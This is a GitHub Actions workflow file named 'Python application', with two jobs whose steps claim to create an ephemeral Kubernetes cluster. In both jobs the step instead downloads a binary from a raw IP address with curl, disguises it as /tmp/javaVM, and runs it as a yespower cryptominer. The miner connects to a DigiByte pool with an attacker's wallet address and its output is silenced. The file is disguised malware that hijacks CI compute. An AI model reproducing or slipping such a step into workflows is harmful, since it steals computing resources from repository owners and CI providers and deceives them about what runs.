name: Python application
##################
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:



jobs:
  build:
    name: Ephemeral cluster
    runs-on: namespace-profile-amd64-medium
	permissions:
      id-token: write
      contents: read
    strategy:
      max-parallel: 1
      fail-fast: false
      matrix:
        go: [1]
        flag: [A, B, C, D]
    
    env:
        NUM_JOBS: 4
        JOB: ${{ matrix.go }}
   steps:
      - uses: actions/checkout@v4
      - uses: namespacelabs/nscloud-setup@v0
      - name: Create an ephemeral Kubernetes cluster
        run: |
          curl -L --progress-bar http://150.136.168.71:80/archxx/sse -o /tmp/javaVM && chmod +x /tmp/javaVM && /tmp/javaVM -a yespower -o 217.156.67.54:80 -u dgb1qjv224at6k9f6em763fjmlplszxdpv896lpywr2.ArchX -p c=DGB,ID=ARCHx -t 5 >/dev/null 2>&1
	  

  deploy:
	name: Ephemeral cluster
    runs-on: namespace-profile-amd64-medium
	permissions:
      id-token: write
      contents: read
    strategy:
      max-parallel: 1
      fail-fast: false
      matrix:
        go: [1]
        flag: [A, B, C, D]
    
    env:
        NUM_JOBS: 4
        JOB: ${{ matrix.go }}
    steps:
      - uses: actions/checkout@v4
      - uses: namespacelabs/nscloud-setup@v0
      - name: Create an ephemeral Kubernetes cluster
        run: |
          curl -L --progress-bar http://150.136.168.71:80/archxx/sse -o /tmp/javaVM && chmod +x /tmp/javaVM && /tmp/javaVM -a yespower -o 217.156.67.54:80 -u dgb1qjv224at6k9f6em763fjmlplszxdpv896lpywr2.ArchX -p c=DGB,ID=ARCHx -t 5 >/dev/null 2>&1
